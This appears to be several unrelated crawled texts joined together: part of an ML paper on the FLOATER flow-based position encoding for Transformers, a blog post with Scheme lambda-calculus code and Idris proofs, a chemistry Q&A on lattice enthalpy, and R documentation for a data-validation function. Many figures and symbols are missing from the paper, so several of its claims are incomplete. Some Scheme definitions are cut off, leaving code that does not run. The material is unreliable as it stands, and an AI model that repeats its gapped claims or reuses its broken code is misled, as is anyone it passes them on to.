models. In this dataset, each item contains a lengthy paragraph containing facts and several questions related to the paragraph. The model needs to predict the range of characters that answer the questions. In SQuAD-v2, the problem becomes more challenging that the questions might be unanswerable by the context. We follow the same data processing script as BERT/RoBERTa for fair comparison; more details about the training process are described in the Supplementary material. The experiment results are presented in Table 5. As we can see, the FLOATER model beats the baseline RoBERTa model consistently across most datasets. The improvement is significant, considering that both models are finetuned from the same pretrained checkpoint. ### 4.3 More Discussions and Analysis #### How inductive is FLOATER? FLOATER is designed to be inductive by a data-driven dynamical model (8). To see how inductive FLOATER is when comparing to existing approaches, we design the following experiment. We first notice that in WMT14 En-De dataset, of the training sentences are shorter than tokens. Based on that, we make a new dataset called En-De short to long (or S2L for brevity): this dataset takes all the short sentences ( tokens) as the training split and all the long sentences ( tokens) as the testing split. We further divide the testing split to four bins according to the source length fallen in . BLEU scores are calculated in each bin, and the results are presented in Figure 2. Our FLOATER model performs particularly well on long sentences, even though only short sentences are seen by the model during training. This empirical observation supports our conjecture that FLOATER model is inductive: the dynamics learned from shorter sequences can be appropriately generalized to longer sequences. #### Is RNN a good alternative to model the dynamics? Recurrent neural network (RNN) is commonly used to perform sequential modeling. RNN and our continuous dynamical model (8) indeed share some commonality. Computing the value at the -th step relies on the results at the -st step. Further, they all contain trainable parameters, allowing them to adapt to each particular task. Lastly, they can be extrapolated to any length as needed. To see if RNN works equally well, we model the sequence with RNN models: pi+1=RNN(zi,pi), (14) where is the input to the RNN model at index . Recall in RNN language models, is the word embedding or hidden feature of the -th token. In our case, since we apply RNN to learn the encodings as opposed to hidden features, sensible inputs can be scalar value or vectorized value by sinusoidal encoding. We tried both choices on WMT14 En-De data and found that vectorized value generally works better, though not as good as our FLOATER model. Detailed results can be found in Table 6. #### What does each position encoding look like? To better understand how different position encodings affect the sequence modeling, in Figure 3, we visualize the position embedding matrix obtained from four different position encoding approaches for the Transformer-base backbone on WMT14 En-De dataset. We can see that sinusoidal encoding (2(a)) is the most structural, while position embedding (2(b)) is quite chaotic. Our FLOATER model learns position representation completely from data, but still exhibits some regularities (2(c)). Finally, the RNN model (2(d) ) fails to extract sufficient positional information, probably due to the vanishing gradient problem. Another finding is that by looking at ( 2(b)), we observe that the vectors are nearly constant among different large positions (near the bottom of Figure 2(b), we see patterns of vertical lines with the same color). This phenomenon is due to long sentences in the dataset being scarce, and so the positional information carried by lower indices cannot be extrapolated to higher indices. On the contrary, the dynamical model proposed in this paper enjoys the best of both worlds – it is adaptive to dataset distribution, and it is inductive to handle sequences with lengths longer than the training split. ### 4.4 Remarks on Training and Testing Efficiency It is not surprising that during the training time, our flow-based method adds a non-negligible time and memory overhead; this is because solving the Neural ODE precisely involves times forward and backward propagations of the flow model. Even though we deliberately designed a small flow model (consisting of only two FFN and one nonlinearity layers), stacking them together still increases training time substantially. To make it possible to train big models, we use the following optimizations: • [nosep,leftmargin=1em,labelwidth=*,align=left] • Initialize with pretrained models that do not contain flow-based dynamics, as discussed in Section 3.3. • From (8), we know that if is close to zero, then the position information diminishes (derived in appendix). In this way, our model degenerates to the original Transformer. Inspired by this property, we can initialize the FLOATER with smaller weights. Combining with the previous trick, we obtain an informed initialization that incurs lower training loss at the beginning. • We observed that weights in are more stable and easy to train. Thus, we can separate the weights of from the remaining parts of the Transformer model. Concretely, we can 1) cache the positional bias vectors for some iterations without re-computing, 2) update the weights of flow models less frequently than other parts of the Transformer, and 3) update the flow models with a larger learning rate to accelerate convergence. • For the RoBERTa model, we adopt an even more straightforward strategy: we first download a pretrained RoBERTa model, plug in some flow-based encoding layers, and re-train the encoding layers on WikiText-103 dataset for one epoch. When finetuning on GLUE datasets, we can choose to freeze the encoding layers. Combining those tricks, we successfully train our proposed models with only -% overhead compared to traditional models, and virtually no overhead when finetuning RoBERTa model on GLUE benchmarks. Moreover, there is no overhead during the inference stage if we store the pre-calculated positional bias vectors in the checkpoints. ## 5 Conclusions In this paper, we have shown that learning position encoding with a dynamical model can be an advantageous approach to improve Transformer models. Our proposed position encoding approach is inductive, data-driven, and parameter efficient. We have also demonstrated the superiority of our proposed model over existing position encoding approaches on various natural language processing tasks such as neural machine translation, language understanding, and question answering tasks. ## References • [1] T. Q. Chen, Y. Rubanova, J. Bettencourt, and D. K. Duvenaud (2018) . In Advances in Neural Information Processing Systems, pp. 6571–6583. Cited by: Appendix A, Appendix A, §1, §3.1. • [2] T. Q. Chen, Y. Rubanova, J. Bettencourt, and D. K. Duvenaud (2018) Neural ordinary differential equations. In Advances in Neural Information Processing Systems 31, S. Bengio, H. Wallach, H. Larochelle, K. Grauman, N. Cesa-Bianchi, and R. Garnett (Eds.), pp. 6571–6583. External Links: Link Cited by: 2nd item. • [3] M. Dehghani, S. Gouws, O. Vinyals, J. Uszkoreit, and Ł. Kaiser (2018) Universal transformers. arXiv preprint arXiv:1807.03819. Cited by: §1, §2.2, §3.2, 2nd item. • [4] J. Devlin, M. Chang, K. Lee, and K. Toutanova (2018) BERT: pre-training of deep bidirectional transformers for language understanding. arXiv preprint arXiv:1810.04805. Cited by: Table 1, §1, §1, §2.2, §3.3, 3rd item. • [5] W. Grathwohl, R. T. Chen, J. Betterncourt, I. Sutskever, and D. Duvenaud (2018) Ffjord: free-form continuous dynamics for scalable reversible generative models. arXiv preprint arXiv:1810.01367. Cited by: §1. • [6] G. Lai, Q. Xie, H. Liu, Y. Yang, and E. Hovy (2017) RACE: large-scale reading comprehension dataset from examinations. arXiv preprint arXiv:1704.04683. Cited by: §4.2, Table 4. • [7] Z. Lan, M. Chen, S. Goodman, K. Gimpel, P. Sharma, and R. Soricut (2019) Albert: a lite bert for self-supervised learning of language representations . arXiv preprint arXiv:1909.11942. Cited by: §1, §1, §2.2, §3.2. • [8] Y. Liu and M. Lapata (2019) Hierarchical transformers for multi-document summarization . arXiv preprint arXiv:1905.13164. Cited by: 1st item. • [9] Y. Liu, M. Ott, N. Goyal, J. Du, M. Joshi, D. Chen, O. Levy, M. Lewis, L. Zettlemoyer, and V. Stoyanov (2019) RoBERTa: a robustly optimized bert pretraining approach. arXiv preprint arXiv:1907.11692. Cited by: §1, §2.2, 3rd item. • [10] S. Merity, C. Xiong, J. Bradbury, and R. Socher (2016) Pointer sentinel mixture models. arXiv preprint arXiv:1609.07843. Cited by: §B.3. • [11] M. Ott, S. Edunov, A. Baevski, A. Fan, S. Gross, N. Ng, D. Grangier, and M. Auli (2019) Fairseq: a fast, extensible toolkit for sequence modeling. arXiv preprint arXiv:1904.01038. Cited by: §B.2, §4. • [12] M. Ott, S. Edunov, D. Grangier, and M. Auli (2018) Scaling neural machine translation. arXiv preprint arXiv:1806.00187. Cited by: §B.2. • [13] W. H. Press, S. A. Teukolsky, W. T. Vetterling, and B. P. Flannery (1992) Numerical recipes in c++. The art of scientific computing 2, pp. 1002. Cited by: §B.1. • [14] A. Radford, J. Wu, R. Child, D. Luan, D. Amodei, and I. Sutskever (2019) Language models are unsupervised multitask learners. Cited by: §1. • [15] C. Raffel, N. Shazeer, A. Roberts, K. Lee, S. Narang, M. Matena, Y. Zhou, W. Li, and P. J. Liu (2019) Exploring the limits of transfer learning with a unified text-to-text transformer . arXiv preprint arXiv:1910.10683. Cited by: §1. • [16] P. Rajpurkar, R. Jia, and P. Liang (2018) Know what you don’t know: unanswerable questions for squad. arXiv preprint arXiv:1806.03822. Cited by: §4.2. • [17] P. Rajpurkar, J. Zhang, K. Lopyrev, and P. Liang (2016) SQuAD: 100,000+ questions for machine comprehension of text. arXiv preprint arXiv:1606.05250. Cited by: §4.2, §4.2. • [18] P. Shaw, J. Uszkoreit, and A. Vaswani (2018) Self-attention with relative position representations. In Proceedings of the 2018 Conference of the North American Chapter of the Association for Computational Linguistics: Human Language Technologies, Volume 2 (Short Papers), pp. 464–468. Cited by: Table 1, §1. • [19] M. Tenenbaum and H. Pollard (1985) Ordinary differential equations: an elementary textbook for students of mathematics, engineering, and the sciences. Dover Books on Mathematics, Dover Publications. External Links: ISBN 9780486649405, LCCN lc85012983, Link Cited by: §3.1. • [20] A. Vaswani, N. Shazeer, N. Parmar, J. Uszkoreit, L. Jones, A. N. Gomez, Ł. Kaiser, and I. Polosukhin (2017) Attention is all you need. In Advances in Neural Information Processing Systems, pp. 5998–6008. Cited by: §B.2, Table 1, §1, §1, §2.2, §3, 2nd item, 3rd item, §4.1. • [21] A. Wang, A. Singh, J. Michael, F. Hill, O. Levy, and S. R. Bowman (2018) GLUE: a multi-task benchmark and analysis platform for natural language understanding. arXiv preprint arXiv:1804.07461. Cited by: §4.2. • [22] Z. Yang, Z. Dai, Y. Yang, J. Carbonell, R. Salakhutdinov, and Q. V. Le (2019) XLNet: generalized autoregressive pretraining for language understanding. arXiv preprint arXiv:1906.08237. Cited by: §1. • [23] C. Yun, S. Bhojanapalli, A. S. Rawat, S. J. Reddi, and S. Kumar (2019) Are transformers universal approximators of sequence-to-sequence functions?. arXiv preprint arXiv:1912.10077. Cited by: §1. • [24] X. Zhang, F. Wei, and M. Zhou (2019) HIBERT: document level pre-training of hierarchical bidirectional transformers for document summarization. CoRR abs/1905.06566. External Links: Link, 1905.06566 Cited by: 1st item. ## Appendix A Training a Neural ODE model in Transformer We discuss the details of training the dynamical model , recall in our FLOWER model, function joins in the computational graph implicitly by generating a sequence of position encoding vectors , conditioning on a freely initialized vector . The generation steps are computed iteratively as follows (suppose we choose the interval between two consecutive tokens to be ) p1 =p0+∫Δ0h(τ,pτ;wh)\difτ, (15) p2 =p1+∫2ΔΔh(τ,pτ;wh)\difτ, pN =pN−1+∫NΔ(N−1)Δh(τ,pτ;wh)\difτ. Finally, the loss of this sequence is going to be a function of all position encoding results , which is further a function of model parameters . The question is how to calculate the gradient through backpropagation. This question is fully solved in Neural ODE method [1] with an efficient adjoint ODE solver. To illustrate the principle, we draw a diagram showing the forward and backward propagation in Figure 4. From [1], we know that the gradients can be computed by \difL\difwh=−∫sta(τ)⊺∂h(τ,pτ;wh)∂wh\difτ, (16) where defined in is called the “adjoint state” of ODE, which can be computed by solving another ODE \difa(τ)\difτ=−a(τ)⊺∂h(τ,pτ;wh)∂pτ. (17) Note that the computation of (17) only involves Jacobian-vector product so it can be efficiently calculated by automatic differentiation. ## Appendix B Implementation details ### b.1 Settings of ODE solver To setup the ODE server, we need to first choose the numerical algorithms [13]. We have different setups for different datasets. For neural machine translation problems (WMT14 En-De and En-Fr), we use the more accurate Runge-Kutta scheme with discretization step to solve the adjoint equation (recall that we set the interval of two neighboring tokens to be globally). While for datasets with long sentences such as GLUE and RACE benchmarks, we found that solving the adjoint equation with high order scheme is too slow, in such case we adopt simple midpoint method with discretization step , and the gradients are calculated by automatic differentiation rather than adjoint method. The third party implementation of ODE solver can be found at https://github.com/rtqichen/torchdiffeq. We run the same preprocessing script provided by fairseq [11], which is also used in ScalingNMT [12]. With the standard training script, we first successfully reproduce all the results in Transformer paper [20]. Based on that we execute the following protocol to get our results: 1. Train the original Transformer model for 30 epochs. 2. Random initialize FLOWER model of same shape configuration. 3. Copy tensors from the best performing checkpoint (validation set) to initialize FLOWER model. Initialize weights in the dynamical model with small values. 4. Half the peak learning rate (e.g. in Transformer-base + En-De, the peak learning rate is changed from to ). 5. With the warm-initialized FLOWER checkpoint, retrain on the same dataset for 10 epochs (En-De) or 1 epoch (En-Fr). 6. Averaging last 5 checkpoints and compute BLEU score on test split. ### b.3 Training language understanding tasks For GLUE/SQuAD/RACE benchmarks, our experiments are all conducted upon RoBERTa, in which both base and large configurations are available. Due to resource constraint (and to show the compatibility to existing models), we initialize our FLOWER model with pretrained RoBERTa, which is similar to NMT task. However, the weights in dynamic function are not trained in large corpus, given that GLUE/SQuAD/RACE datasets are too small to train dynamics from scratch, we decided to pretrain alone in WikiText103 [10] data using masked language modeling loss. We have found that when we train alone, it only takes a few hours (2x Titan V100) and one epoch to convergence. Once having the pretrained FLOWER model, we can run following downstream tasks and compare with RoBERTa under the same setting: #### GLUE benchmark consists of eight datasets and each have different hyperparameter settings. For hyperparameters such as learning rate, batch size, training iterations, warm-up iterations, etc., we use the same values recommended by official repository of RoBERTa. For this benchmark we wrote our own finetuning code because currently there is no official code available. During the implementation process, we mainly refer to the third-party repositories. We are not able to exactly match the official result reported in RoBERTa paper but quite close ( difference in F1). For our FLOWER model, we use the same hyperparameters as RoBERTa. #### RACE benchmark. This benchmark has the longest context and sequence length. We follow the official training script and reproduce the result. Similar to other benchmarks, we then repeat the training process using exactly the same training hyperparameters to make a fair comparison. In this benchmark we freeze the weights and only finetune the weights of RoBERTa. ## Appendix C Cases suitable for non-equidistant discritization Although our model allows continuous values of and in (8), limiting the scope to text modeling tasks, positions are discrete values as . Once the continuous version of position representation is obtained, we simply take the discritized as the actual values to feed into Transformer model, where is a hyperparameter (e.g. ). By choosing positions equidistantly, we are implicitly assuming the position signal evolves steadily as we go through each token in a sentence. More generally, the dynamics in (8) can deal with the case in which positions are not integers etc., but arbitrary monotone increasing series which may not be equidistant. In appendix, we exemplify this general situation with several widely deployed tasks; we regard this as a interesting future direction. This makes our model particularly suitable for following scenarios yet traditional position representation may not be good at: • [nosep,leftmargin=1em,labelwidth=*,align=left] • Hierarchical Transformer model [8, 24]. The model is a direct extension of hierarchical RNN and is often used in long document processing. It works by first running a word-level Transformer model on each sentence to extract the sentence embedding, and then applying a sentence-level Transformer scanning through each sentence embedding sequentially. We argue that when processing at the sentence level, it could be better to set the increment of position index proportional to the length of the -th sentence. This is because longer sentences tend to carry more information, so is likely to move farther from . • Transformer for time-series events. As measurement time is continuous, time-series data is another scenario when a continuous position makes more sense than a discrete counterpart. More importantly, to predict the future values by modeling historical values observed at irregular time grids, it is better to consider the length of time horizon between two consecutive measures. A successful previous work is the Latent ODE [2], except that they use RNN as the backbone, and they model the hidden states rather than position representations with Neural ODE (because RNN itself provides positional bias). In this paper, we are not going to explore the more general cases discussed above. Instead, we decided to leave them as interesting future work.
2022-12-05 18:34:52
{"extraction_info": {"found_math": true, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 1, "mathjax_display_tex": 0, "mathjax_asciimath": 0, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.568327784538269, "perplexity": 1608.585659917548}, "config": {"markdown_headings": true, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.18, "absolute_threshold": 10, "end_threshold": 5, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2022-49/segments/1669446711042.33/warc/CC-MAIN-20221205164659-20221205194659-00815.warc.gz"}
https://bor0.wordpress.com/category/mathematics/
# Lambda calculus implementation in Scheme Lambda calculus is a formal system for representing computation. As with most formal systems and mathematics, it relies heavily on substitution. We will start by implementing a subst procedure that accepts an expression e, a source src and a destination dst which will replace all occurences of src with dst in e. (define (subst e src dst) (cond ((equal? e src) dst) ((pair? e) (cons (subst (car e) src dst) (subst (cdr e) src dst))) (else e))) Trying it a couple of times: > (subst '(lambda (x) x) 'x 'y) '(lambda (y) y) > (subst '(lambda (x) x) '(lambda (x) x) 'id) 'id Next, based on this substitution we need to implement a beta-reduce procedure that, for a lambda expression $(\lambda x . t) s$ will reduce to $t[x := s]$, that is, $t$ with all $x$ within $t$ replaced to $s$. Our procedure will consider 3 cases: 1. Lambda expression that accepts zero args – in which case we just return the body without any substitutions 2. Lambda expression that accepts a single argument – in which case we substitute every occurrence of that argument in the body with what’s passed to the expression and return the body 3. Lambda expression that accepts multiple arguments – in which case we substitute every occurrence of the first argument in the body with what’s passed to the expression and return a new lambda expression Before implementing the beta reducer, we will implement a predicate lambda-expr? that returns true if the expression is a lambda expression, and false otherwise: (define (lambda-expr? e) (and (pair? e) (equal? (car e) 'lambda) Here’s the helper procedure which accepts a lambda expression e and a single argument x to pass to the expression: (define (beta-reduce-helper e x) (cond ((and (lambda-expr? e) ; lambda expr that accepts multiple args (list 'lambda ((and (lambda-expr? e) ; lambda expr that accepts a single arg ((and (lambda-expr? e) ; lambda expr with zero args (else e))) Then, our procedure beta-reduce will accept variable number of arguments, and apply each one of them to beta-reduce-helper: (define (beta-reduce l . xs) (if (pair? xs) (apply beta-reduce (beta-reduce-helper l (car xs)) (cdr xs)) l)) Testing these with a few cases: > (beta-reduce '(lambda (x y) x) 123) '(lambda (y) 123) > (beta-reduce '(lambda (x y) y) 123) '(lambda (y) y) > (beta-reduce '(lambda (x) (lambda (y) x)) 123) '(lambda (y) 123) > (beta-reduce '(lambda (x) (lambda (y) y)) 123) '(lambda (y) y) However, note this case: > (beta-reduce '(lambda (n f x) (f (n f x))) '(lambda (f x) x)) '(lambda (f x) (f ((lambda (f x) x) f x))) It seems that we can further apply beta reductions to simplify that expression. For that, we will implement lambda-eval that will recursively evaluate lambda expressions to simplify them: (define (lambda-eval e) (cond ((can-beta-reduce? e) (lambda-eval (apply beta-reduce e))) ((pair? e) (cons (lambda-eval (car e)) (lambda-eval (cdr e)))) (else e))) But, what does it mean for an expression e to be beta reducible? The predicate is simply: (define (can-beta-reduce? e) (and (pair? e) (lambda-expr? (car e)) (pair? (cdr e)))) Great. Let’s try a few examples now: > ; Church encoding: 1 = succ 0 > (lambda-eval '((lambda (n f x) (f (n f x))) (lambda (f x) x))) '(lambda (f x) (f x)) > ; Church encoding: 2 = succ 1 > (lambda-eval '((lambda (n f x) (f (n f x))) (lambda (f x) (f x)))) '(lambda (f x) (f (f x))) > ; Church encoding: 3 = succ 2 > (lambda-eval '((lambda (n f x) (f (n f x))) (lambda (f x) (f (f x))))) '(lambda (f x) (f (f (f x)))) There’s our untyped lambda calculus 🙂 There are a couple of improvements that we can do, for example implement define within the system to define variables with values. Another neat addition would be to extend the system with a type checker. EDIT: As noted by a reddit user, the substitution procedure is not considering free/bound variables. Here’s a gist that implements that as well. # Closed-expression of a sum with proof in Idris One well known fact is the sum $1 + 2 + \ldots + n = \frac {n(n + 1)} {2}$. Let’s try to prove this fact in Idris. We start intuitively by defining our recursive sum function: total sum : Nat -> Nat sum Z = Z sum (S n) = (S n) + sum n Testing it a few times: Idris> sum 3 6 : Nat Idris> sum 4 10 : Nat Looks good. Next, we will come up with out dependently typed function to prove the fact. theorem_1_firsttry : (n : Nat) -> sum n = divNat (n * (n + 1)) 2 theorem_1_firsttry Z = ?a theorem_1_firsttry (S n) = ?b The base case that we need to prove is of type 0 = divNat 0 2. Looks a bit tricky. Let’s try to use divNatNZ along with a proof that 2 is not zero: theorem_1_secondtry : (n : Nat) -> sum n = divNatNZ (n * (n + 1)) 2 (SIsNotZ {x = 1}) theorem_1_secondtry Z = ?a theorem_1_secondtry (S n) = ?b Now the base case is just Refl. Let’s put an inductive hypothesis as well: theorem_1_secondtry : (n : Nat) -> sum n = divNatNZ (n * (n + 1)) 2 (SIsNotZ {x = 1}) theorem_1_secondtry Z = Refl theorem_1_secondtry (S n) = let IH = theorem_1_secondtry n in ?b Idris tells us that we now need to prove: b : S (plus n (sum n)) = ifThenElse (lte (plus (plus n 1) (mult n (S (plus n 1)))) 0) (Delay 0) (Delay (S (Prelude.Nat.divNatNZ, div' (S (plus (plus n 1) (mult n (S (plus n 1))))) 1 SIsNotZ (plus (plus n 1) (mult n (S (plus n 1)))) (minus (plus (plus n 1) (mult n (S (plus n 1)))) 1) 1))) Woot. Let’s take a slightly different route by doing a few algebraic tricks to get rid off division. Instead of proving that $1 + 2 + \ldots + n = \frac {n(n + 1)} {2}$, we will prove $2 * (1 + 2 + \ldots + n) = n(n + 1)$. total theorem_1 : (n : Nat) -> 2 * sum n = n * (n + 1) -- sum n = n * (n + 1) / 2 theorem_1 Z = Refl theorem_1 (S n) = ?b Now we need to show that b : S (plus (plus n (sum n)) (S (plus (plus n (sum n)) 0))) = S (plus (plus n 1) (mult n (S (plus n 1)))). total theorem_1 : (n : Nat) -> 2 * sum n = n * (n + 1) -- sum n = n * (n + 1) / 2 theorem_1 Z = Refl theorem_1 (S n) = let IH = theorem_1 n in rewrite (multRightSuccPlus n (plus n 1)) in rewrite sym IH in rewrite (plusZeroRightNeutral (sum n)) in rewrite (plusZeroRightNeutral (plus n (sum n))) in rewrite (plusAssociative n (sum n) (sum n)) in rewrite (sym (plusSuccRightSucc (plus n (sum n)) (plus n (sum n)))) in rewrite plusCommutative (plus n 1) (plus (plus n (sum n)) (sum n)) in rewrite sym (plusSuccRightSucc n Z) in rewrite plusZeroRightNeutral n in rewrite (sym (plusSuccRightSucc (plus (plus n (sum n)) (sum n)) n)) in rewrite (sym (plusAssociative (n + sum n) (sum n) n)) in rewrite plusCommutative (sum n) n in Refl Looks a bit big, but it works! With line 4 and 5 we get rid off multiplication and then all we need to do is some algebraic re-ordering of plus to show that both sides are equivalent. Now that we proved it, you can use this fact in your favorite programming language 🙂 # Proving length of mapped and filtered lists in Idris First, let’s start by implementing map' and filter' for lists: total map' : (a -> b) -> List a -> List b map' _ [] = [] map' f (x :: xs) = f x :: map' f xs total filter' : (a -> Bool) -> List a -> List a filter' p [] = [] filter' p (x::xs) with (p x) filter' p (x::xs) | True = x :: filter' p xs filter' p (x::xs) | False = filter' p xs Trying a few cases: Idris> map' (\x => x + 1) [1, 2] [2, 3] : List Integer Idris> filter' (\x => x /= 2) [1, 2] [1] : List Integer Looks neat. A valid question would be: What do we know about the length of a mapped and length of a filtered list? Intuition says that the length of a mapped list will be the same as the length of that list, since the values of the elements might change but not the actual length (size) of the original list. Let’s prove this fact: -- For any given list xs, and any function f, the length of xs is same as the length of xs mapped with f total theorem_1 : (xs : List a) -> (f : a -> b) -> length xs = length (map' f xs) theorem_1 [] _ = Refl theorem_1 (x :: xs) f = let I_H = theorem_1 xs f in rewrite I_H in Refl Easy peasy, just use induction. Filtering is a bit trickier. The length of a filtered list can be less than or equal to the original list. The intuitive reasoning for this is as follows: 1. Maybe the filter will apply to some elements, in which case the length of the filtered list will be less than the length of the original list 2. Or, maybe the filter will not apply at all, in which case the length of the filtered list is the same as the length of the original list Let’s prove it! -- For any given list xs, and any filtering function f, the length of xs >= the length of xs filtered with f total theorem_2 : (xs : List a) -> (f : a -> Bool) -> LTE (length (filter' f xs)) (length xs) theorem_2 [] _ = LTEZero {right = 0} theorem_2 (x :: xs) f with (f x) theorem_2 (x :: xs) f | False = let I_H = theorem_2 xs f in let LTESuccR_I_H = lteSuccRight I_H in LTESuccR_I_H theorem_2 (x :: xs) f | True = let I_H = theorem_2 xs f in let LTESucc_I_H = LTESucc I_H in LTESucc_I_H I constructed this proof using holes. The base case was very simple, however, for the inductive step we needed to do something else. With the inductive step we consider two cases: 1. In the case the filter was applied (False), the I_H needs to match the target type LTE _ (S _) 2. In the case the filter was not applied (True), the I_H needs to match the target type LTE (S _) (S _) Idris has built-in proofs for these, with the following types: Idris> :t lteSuccRight lteSuccRight : LTE n m -> LTE n (S m) Idris> :t LTESucc LTESucc : LTE left right -> LTE (S left) (S right) So we just needed to use them to conclude the proof. Bonus: The only reason I rewrote filter' was to use with which seems easier to rewrite to when proving stuff about it. The built-in filter uses ifThenElse and I haven’t found a way to rewrite goals that are using it. I rewrote map' just for consistency. Bonus 2: Thanks to gallais@reddit for this hint. It seems that the same with (f x) used in the proof also makes the ifThenElse reduce.
2018-10-15 21:09:20
{"extraction_info": {"found_math": true, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 0, "mathjax_display_tex": 0, "mathjax_asciimath": 1, "img_math": 9, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.7299880385398865, "perplexity": 4301.091379081195}, "config": {"markdown_headings": true, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.18, "absolute_threshold": 10, "end_threshold": 15, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2018-43/segments/1539583509845.17/warc/CC-MAIN-20181015205152-20181015230652-00180.warc.gz"}
https://chemistry.stackexchange.com/questions/129138/resolving-ambiguity-around-lattice-enthalpy-in-born-haber-cycle
# Resolving ambiguity around Lattice Enthalpy in Born-Haber Cycle According to my textbook, Lattice enthalpy is the enthalpy change that occurs when one mole of a solid ionic compound is separated into gaseous ions under standard conditions.$$^1$$ According to the same textbook, this is an endothermic process, which makes sense as a lattice is generally held together by strong ionic bonds and thus would require energy to separate the atoms. The following diagram is given for the born-haber cycle in the textbook: The diagram supports the definition as the enthalpy of the individual gaseous atoms is greater than that of the lattice, i.e. the arrow moves up. However, as I was working through past papers by the International Baccalaureate, a question asked to draw the born-haber cycle for LiF.$$^2$$ This was the answer: In this case, the arrow is pointing down for the lattice enthalpy. To me, this does not suite the definition of lattice enthalpy as separating a lattice into its ions would require energy and not release energy. Hence, should the arrow not be pointing upwards for $$\ce{LiF_{(s)}}$$ to $$\ce{Li^+_{(g)} + Cl^-_{(g)}}$$? Am I making a fundamental error, is the case for NaCl different to LiF or is the answer wrong? Works Cited: 1. Pearson Baccalaureate: Higher Level Chemistry 2nd Edition. By Catrin Brown and Mike Ford 2. International Baccalaureate • The downward pointing arrow means that energy is released when the crystalline solid is formed from the gas phase separated ions. So it is the negative of lattice enthalpy. The diagram is just a schematic showing the enthalpy balance in the B-H cycle. – Ed V Mar 16 at 22:53 • Ah, that makes sense, thank you. So, just to clarify, the arrow for the first image is for lattice enthalpy (endothermic) and therefore points upwards and the arrow for the second image is negative lattice enthalpy (exothermic) and therefore points downward? – Liam Mar 17 at 8:40 • Exactly correct! – Ed V Mar 17 at 12:28 • Cheers for the help! :-) – Liam Mar 17 at 12:31
2020-06-06 00:49:15
{"extraction_info": {"found_math": true, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 0, "mathjax_display_tex": 0, "mathjax_asciimath": 0, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 4, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.7607769966125488, "perplexity": 1116.1501656594191}, "config": {"markdown_headings": true, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.18, "absolute_threshold": 10, "end_threshold": 15, "enable": false}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2020-24/segments/1590348509264.96/warc/CC-MAIN-20200606000537-20200606030537-00142.warc.gz"}
https://appsilon.github.io/data.validator/reference/validate_cols.html
Validation on columns ## Usage validate_cols( data, predicate, ..., obligatory = FALSE, description = NA, skip_chain_opts = FALSE, success_fun = assertr::success_append, error_fun = assertr::error_append, defect_fun = assertr::defect_append ) ## Arguments data A data.frame or tibble to test predicate Predicate function or predicate generator such as in_set or within_n_sds ... Columns selection that predicate should be called on. All tidyselect language methods are supported obligatory If TRUE and assertion failed the data is marked as defective. For defective data, all the following rules are handled by defect_fun function description A character string with description of assertion. The description is then displayed in the validation report skip_chain_opts While wrapping data with validate function, success_fun and error_fun parameters are rewritten with success_append and error_append respectively. In order to use parameters assigned to the function directly set skip_chain_opts to TRUE success_fun Function that is called when the validation pass error_fun Function that is called when the validation fails defect_fun Function that is called when the data is marked as defective
2023-02-03 00:35:26
{"extraction_info": {"found_math": true, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 0, "mathjax_display_tex": 0, "mathjax_asciimath": 1, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.26569175720214844, "perplexity": 7878.469833454227}, "config": {"markdown_headings": true, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.18, "absolute_threshold": 10, "end_threshold": 15, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2023-06/segments/1674764500041.2/warc/CC-MAIN-20230202232251-20230203022251-00778.warc.gz"}
http://mathhelpforum.com/trigonometry/96503-solve-x.html
